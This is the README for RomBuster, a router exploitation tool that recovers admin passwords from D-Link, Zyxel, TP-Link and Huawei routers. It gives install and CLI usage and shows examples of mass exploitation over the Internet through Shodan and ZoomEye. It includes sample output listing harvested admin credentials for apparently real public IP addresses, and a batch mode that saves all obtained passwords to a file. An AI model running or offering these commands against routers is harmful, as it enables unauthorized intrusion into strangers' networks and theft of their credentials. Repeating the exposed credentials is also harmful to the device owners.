RomBuster
Is a router exploitation tool that allows to disclosure network router admin password.
Features:
- Exploits vulnerabilities in most popular routers such as D-Link, Zyxel, TP-Link and Huawei.
- Optimized to exploit multiple routers at one time from list.
- Simple CLI and API usage.
Installation
python3 -m pip install git+https://github.com/EntySec/RomBuster
Usage
rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]
Flags
RomBuster is a router exploitation tool that allows to disclosure network router admin password.
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
Examples
Exploiting single router
Let’s hack my router just for fun.
rombuster -a 192.168.99.1
Exploiting routers from Internet
Let’s try to use Shodan search engine to exploit routers over Internet.
rombuster --shodan [API-KEY]
$ rombuster --shodan [REDACTED]
[*] Authorizing Shodan by given API key...
[+] Authorization successfully completed!
[+] (187.200.68.1:80) - admin:3931623066
[+] (2.191.126.139:80) - admin:admin
[*] Exploiting...
Exploiting routers from input file
Let’s try to use opened database of routers.
rombuster -i routers.txt -o passwords.txt
NOTE: It will exploit all routers in routers.txt
list by their addresses and save all obtained passwords to passwords.txt
.